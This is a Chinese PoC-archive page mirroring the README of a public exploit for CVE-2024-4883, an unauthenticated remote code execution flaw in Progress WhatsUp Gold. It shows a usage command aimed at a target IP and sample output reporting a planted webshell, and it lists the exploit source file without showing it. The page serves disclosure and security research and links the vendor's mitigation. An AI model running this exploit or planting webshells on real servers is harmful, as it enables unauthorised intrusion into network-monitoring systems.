支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: d63711d5953e0a393ff713d571123cfb59533d8f

来源
https://github.com/sinsinology/CVE-2024-4883
关联漏洞
标题:Progress Software WhatsUp Gold 安全漏洞 (CVE-2024-4883)
Description:Progress Software WhatsUp Gold是美国Progress Software公司的一款网络监控软件。用于监控整个网络基础设施以及应用程序、配置和网络流量。 Progress Software WhatsUp Gold 2023.1.3版本存在安全漏洞,该漏洞源于允许未经身份验证的攻击者通过 NmApi.exe 以服务帐户身份实现远程代码执行。
Description
Exploit for CVE-2024-4883
介绍
# CVE-2024-4883
PoC for CVE-2024-4883 Progress WhatsUp Gold WriteDatafile Unauthenticated Remote Code Execution (CVE-2024-4883)


## Technical Analysis
A root cause analysis of the vulnerability can be found on my blog:
https://summoning.team/blog/progress-whatsup-gold-WriteDataFile-CVE-2024-4883-RCE/

[![ZDI](poc.jpg)](https://summoning.team/blog/progress-whatsup-gold-WriteDataFile-CVE-2024-4883-RCE/)




## Usage
```
WhatsUpWriteDataFileExploit.exe --target 192.168.0.11 --port 9643 --webshell hax.aspx

 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |

        (*) Progress WhatsUp Gold WriteDataFile Unauthenticated Remote Code Execution (CVE-2024-4883)

        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)

        (*) Technical details: https://summoning.team/blog/progress-whatsup-gold-WriteDataFile-CVE-2024-4883-RCE


(^_^) Prepare for the Pwnage (^_^)

(*) Connecting to ICoreServices net.tcp://192.168.0.11:9643/
(*) Connection is ready
(*) Using write what where primitive, to plant C:\Program Files (x86)\Ipswitch\WhatsUp\html\NmConsole\eb8e455a-28d2-4628-80cb-ef2d786c8409.aspx
(+) Webshell has been planted at https://192.168.0.11/NmConsole/eb8e455a-28d2-4628-80cb-ef2d786c8409.aspx

```

## Mitigations
Update to the latest version or mitigate by following the instructions within the Progress Advisory
* https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-June-2024

## Follow Us on Twitter(X) for the latest security research:
*  [SinSinology](https://x.com/SinSinology)
*  [SummoningTeam](https://x.com/SummoningTeam)

## Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
文件快照

 [4.0K]  /data/pocs/d63711d5953e0a393ff713d571123cfb59533d8f
├── [3.4K]  CVE-2024-4883.cs
├── [672K]  poc.jpg
└── [2.1K]  README.md

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。